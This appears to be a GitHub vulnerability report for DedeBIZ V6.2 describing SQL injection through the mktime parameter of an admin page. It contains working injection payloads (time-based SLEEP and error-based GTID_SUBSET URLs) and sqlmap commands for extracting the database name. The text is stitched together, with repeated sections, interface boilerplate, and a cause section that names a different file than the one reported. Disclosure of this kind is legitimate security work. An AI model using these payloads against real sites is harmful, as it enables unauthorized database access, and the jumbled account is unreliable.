You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND GTID_SUBSET(CONCAT(0x716b787871,(SELECT (ELT(2192=2192,1))),0x716b7a6a71),2192)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf)
3.run the command python sqlmap.py -r sql.txt --risk=3 --level=5 --current-db in sqlmap.After the probe,it is found that there is SQL injection at parameter mktime and obtain the name of current database.
[Cause of vulnerability]
/src/admin/tags_main.php,the user can control the value of the parameter $mktime and the system does not validate the
validity of the user's input.So there is possibility of sql injection.
The text was updated successfully, but these errors were encountered:
[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base]
DedeBIZ V6.2
[Affected Component]
File: /src/admin/makehtml_taglist_action.php
Parameter: mktime
python sqlmap.py -r sql.txt --current-db
[Attack Type]
Remote
[Vulnerability demonstration]
1.After logging in the website backend as the administrator,access
http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)
it is found that there is truely delay when accessing.
payload:
http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)
2.In order to improve the success rate of injection, the -r command is used here to specify the packet file for injection.Access http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1*
and use burpsuite to capture the data package.Copy the captured data package into sql.txt in the sqlmap directory.
the captured data package:
3.run the command
python sqlmap.py -r sql.txt --risk=3 --level=5 --current-db
in sqlmap.After the probe,it is found that there is SQL injection at parameter mktime and obtain the name of current database.[Cause of vulnerability]
/src/admin/tags_main.php,the user can control the value of the parameter $mktime and the system does not validate the
validity of the user's input.So there is possibility of sql injection.
The text was updated successfully, but these errors were encountered: